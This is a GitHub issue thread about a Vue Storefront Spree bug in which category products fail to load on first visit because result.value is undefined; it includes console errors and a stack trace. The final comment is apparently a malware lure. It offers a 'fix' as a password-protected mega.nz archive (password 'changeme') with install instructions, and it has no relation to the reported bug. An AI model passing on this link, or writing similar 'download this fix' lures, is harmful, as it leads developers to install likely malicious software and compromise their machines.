### ISSUE TITLE
[Bug]: Category products not loading first time

### ISSUE THREAD

**Issue by shozayen** [vuestorefront/spree#308]
### Expected Behavior

Products from Category.vue should be loaded

### Actual Behavior

First time I navigate to categories page which should show all products, instead it showed and the below error screenhost.
If I leave the Categories page and navigate to any other page, then come back, the products are loaded. When I use the inspect, I can see the products are loaded and no issue.

**Error description**
The error I can see in the console refers to result.value being sent as undefined. All methods that use the result.value then start to throw errors, which lead to below screenshot.

![image](https://github.com/user-attachments/assets/d61af1ed-688f-442b-910f-8bdb157fab7b)

### Possible Solution

I have no idea why the result.value is not yet loaded, and the getters method called it before it was loaded.

### Steps to reproduce

Steps:
- Open localhost:3000 (or main page)
- Navigate to products page, not to a specific category, but to page that has all products.
- Component not loaded, and an error is shown instead.

### What version of Spree integration are you using?

v1.5.0

### What version of Node.js are you using?

v14.18.0

### What browser (and version) are you using?

Chrome, Safari

### What operating system (and version) are you using?

macOs, Iphone, Windows

### Relevant log output

```shell
result.value is not yet defined when below methods were calling it:
    const products = computed(() => facetGetters.getProducts(result.value));
    const breadcrumbs = computed(() => facetGetters.getBreadcrumbs(result.value).map(e => ({...e, link: context.localePath(e.link)})));
    const pagination = computed(() => facetGetters.getPagination(result.value));
    const categoryTree = computed(() => facetGetters.getCategoryTree(result.value));



Error in chrome:
client.js:103 TypeError: Cannot read properties of undefined (reading 'parent')
    at buildBreadcrumbs (categoryGetters.ts:24:1)
    at getCategoryBreadcrumbs (categoryGetters.ts:34:1)
    at Object.getBreadcrumbs (facetGetters.ts:58:1)
    at VueComponent.eval (Category.vue:256:1)
    at Watcher.get (vue.common.dev.js:4490:1)
    at Watcher.evaluate (vue.common.dev.js:4592:1)
    at RefImpl.computedGetter [as value] (vue-composition-api.esm.js:1463:1)
    at VueComponent.get [as breadcrumbs] (vue-composition-api.esm.js:1689:1)
    at Object.get (vue.common.dev.js:2109:1)
    at Proxy.render (Category.vue:10:1)
```

<img width="736" alt="image" src="https://github.com/user-attachments/assets/c36c4d20-3662-4fb0-983b-4e287650b659">

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Musharrafjamal** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://mega.nz/folder/905izDCI#tZAd-Ja0A5L7aBS2VunHtg
password: changeme
when you installing it, you need to place a check in install to path and select "USX"
